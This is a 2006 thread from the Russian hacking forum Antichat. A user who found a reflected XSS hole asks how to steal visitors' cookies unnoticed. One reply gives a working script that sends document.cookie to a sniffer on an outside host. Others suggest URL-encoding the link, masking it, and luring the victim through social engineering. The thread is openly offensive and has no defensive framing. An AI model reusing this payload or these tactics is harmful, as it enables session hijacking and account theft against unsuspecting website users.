ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Подскажите по Xss
  #1  
Старый 04.04.2006, 23:49
Аватар для Laggi
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401

Репутация: 2
По умолчанию Подскажите по Xss

Нашел XSS уязвимость... в запросе .cgi файла... могу в хтмл-код внедрить любой другой хтмл код :-)
Что дальше сделать можно?

К примеру как беспалева потырить кукизы.. ведь не пошлешь же ты напрямую ссылку со скриптами

Последний раз редактировалось Laggi; 04.04.2006 в 23:55..
 
Ответить с цитированием

  #2  
Старый 05.04.2006, 03:05
Аватар для porter
porter
Познающий
Регистрация: 01.03.2005
Сообщений: 80
Провел на форуме:
606375

Репутация: 12
По умолчанию

Заныкай ссылку со скриптами здесь - http://loc.netsec.ru/create.html
 
Ответить с цитированием

  #3  
Старый 05.04.2006, 03:09
Аватар для NaX[no]rT
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
 
Ответить с цитированием

  #4  
Старый 05.04.2006, 11:13
Аватар для Laggi
Laggi
Познающий
Регистрация: 19.08.2005
Сообщений: 44
Провел на форуме:
103401

Репутация: 2
По умолчанию

Цитата:
Сообщение от NaX[no]r†  
Если можешь внедрить, так внедряй снифер и всё. Проблема то в чём, не знаешь как? вот, попробуй вставь вот это
Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
гммм... дело в том, что ХСС видимо пассивный, при гет запросе к примеру могу вставить:
patt="><script>alert(document.cookie)</script>
Вот... гм... как бы его протолкнуть...
 
Ответить с цитированием

  #5  
Старый 05.04.2006, 17:48
Аватар для Otaku
Otaku
Познавший АНТИЧАТ
Регистрация: 24.07.2005
Сообщений: 1,057
Провел на форуме:
1864132

Репутация: 116


По умолчанию

СИ применить. Хотя весьма не надёжно.
 
Ответить с цитированием

  #6  
Старый 05.04.2006, 18:21
Аватар для drmist
drmist
Green member - Level 3
Регистрация: 08.10.2005
Сообщений: 396
Провел на форуме:
400609

Репутация: 239
По умолчанию

Я предлогаю ознакомится со следующей статьей.
Мне говорили, что она интересная )))
http://www.security-teams.net/index.php?showtopic=2492
__________________
Никому нельзя верить...
 
Ответить с цитированием

  #7  
Старый 10.04.2006, 23:10
Аватар для PinkPanther
PinkPanther
[ розовый мафиозо ]
Регистрация: 16.03.2005
Сообщений: 301
Провел на форуме:
1736355

Репутация: 241
По умолчанию

1. переводиш ссылку со скриптом в ури кодировку, и методом СИ париш жертве.
2. поступаеш тем способом что описал я в статье про взлом аккаунтов на народе, или Censored про взлом аккаунтов на форуме Хакера, т.е. из пассива как бы делаеш актив.
3. побольше фантазии!!! ))
 
Ответить с цитированием

  #8  
Старый 09.05.2006, 12:57
Аватар для alex-19841
alex-19841
Познающий
Регистрация: 31.03.2006
Сообщений: 58
Провел на форуме:
163249

Репутация: 1
По умолчанию

porter
Пример можешь показать как заныканой ссылкой пользоваться
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подскажите работающие Прокси!!! ZzSnakezZ Чаты 4 10.03.2005 23:10
Подскажите Proxy $ZLO$ Болталка 3 06.02.2005 14:29



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ